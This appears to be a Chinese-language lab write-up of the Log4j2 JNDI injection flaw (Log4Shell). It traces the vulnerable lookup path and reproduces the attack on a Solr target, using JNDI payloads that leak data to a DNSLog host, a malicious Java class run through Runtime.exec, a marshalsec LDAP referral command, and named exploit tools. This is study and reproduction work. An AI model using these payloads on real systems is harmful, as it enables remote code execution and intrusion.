Log4j2

## 概述

Log4j 是 Apache 软件基金会下的一个开源日志记录框架，专为 Java 应用程序设计。

Log4j 提供了灵活的日志记录功能，允许开发者控制日志信息的输出格式、级别和目标位置。

Apache Log4j 2 是对Log4j的升级，它比其前身Log4j 1.x提供了重大改进。

## 漏洞版本

2.0 <= Apache log4j2 <= 2.14.1

## 漏洞原理

利用方式：

```java
package log4j;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4j {
	public static final Logger logger = LogManager.getLogger(Log4j.class)
    public static void main(String[] args){
        logger.info("${jndi:ldap://127.0.0.1:1099/Evil}");
    }
} 
```

log4j2的漏洞主要出现在 org.apache.logging.log4j.core.lookup.StrSubstitutor类上。

该类会先对${进行匹配：

![image-20251029111019722](https://oss.maolin101.com/image-20251029111019722.png-101.webp)

然后再提取尾部的}，以此来提取内部的值，传递给变量，prefix="jndi:ldap://111.230.38.159:389/EvilObj"

![image-20251029111106494](https://oss.maolin101.com/image-20251029111106494.png-101.webp)

然后会进入resolveVariable来触发lookup方法：resolveVariable方法会尝试解析变量，变量解析器会将变量的字符串解析为值，传递给lookup。

![image-20251029112013821](https://oss.maolin101.com/image-20251029112013821.png-101.webp)

lookup方法: 会匹配提取出前面的JNDI信息，var变量为jndi:ldap://111.230.38.159:389/EvilObj，prefix变量=jndi，

![image-20251029111432057](https://oss.maolin101.com/image-20251029111432057.png-101.webp)

![image-20251029112746788](https://oss.maolin101.com/image-20251029112746788.png-101.webp)

再后面，调用了jndi.lookup函数：
![image-20251029113012588](https://oss.maolin101.com/image-20251029113012588.png-101.webp)

![image-20251029113028457](https://oss.maolin101.com/image-20251029113028457.png-101.webp)

再追进jndi.lookup方法：继续调用了jndiManager.lookup函数。
![image-20251029113110106](https://oss.maolin101.com/image-20251029113110106.png-101.webp)

![image-20251029113155616](https://oss.maolin101.com/image-20251029113155616.png-101.webp)

再追jndiManager.lookup方法：访问了真正的InitialContext

![image-20251029113444320](https://oss.maolin101.com/image-20251029113444320.png-101.webp)

![image-20251029113455196](https://oss.maolin101.com/image-20251029113455196.png-101.webp)

![image-20251029113618428](https://oss.maolin101.com/image-20251029113618428.png-101.webp)

this.context = InitialContext。

## 漏洞复现

1、启动容器、访问靶场。

![image-20251029151435814](https://oss.maolin101.com/image-20251029151435814.png-101.webp)

![image-20251029151531807](https://oss.maolin101.com/image-20251029151531807.png-101.webp)

2、在/solr/admin/cores?有个参数可以传，这就是个注入点，试试能不能输出java版本，构造payload。

```url
http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.n4df91.dnslog.cn}
```

DNSLog平台地址：http://dnslog.cn/

![image-20251029152336871](https://oss.maolin101.com/image-20251029152336871.png-101.webp)

3、构造恶意java文件，且编译为class文件。

```java
import java.lang.Runtime;
import java.lang.Process;

public class Evil {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/maolin"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}
```

![image-20251029152740800](https://oss.maolin101.com/image-20251029152740800.png-101.webp)

4、本地开启http服务。

![image-20251029153202644](https://oss.maolin101.com/image-20251029153202644.png-101.webp)

5、模拟LDAP服务：

```cmd
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.1.4:8000/#Evil" 9999
```

![image-20251029153630526](https://oss.maolin101.com/image-20251029153630526.png-101.webp)

6、发送完整的payload请求。

```url
http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://192.168.1.4:9999/Evil}
```

![image-20251029153903929](https://oss.maolin101.com/image-20251029153903929.png-101.webp)

写入成功。

![image-20251029153923984](https://oss.maolin101.com/image-20251029153923984.png-101.webp)

7、查看日志记录：
![image-20251029153948465](https://oss.maolin101.com/image-20251029153948465.png-101.webp)

![image-20251029154001254](https://oss.maolin101.com/image-20251029154001254.png-101.webp)

一键工具：JNDI注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 或 JNDIExploit-1.4-SNAPSHOT.jar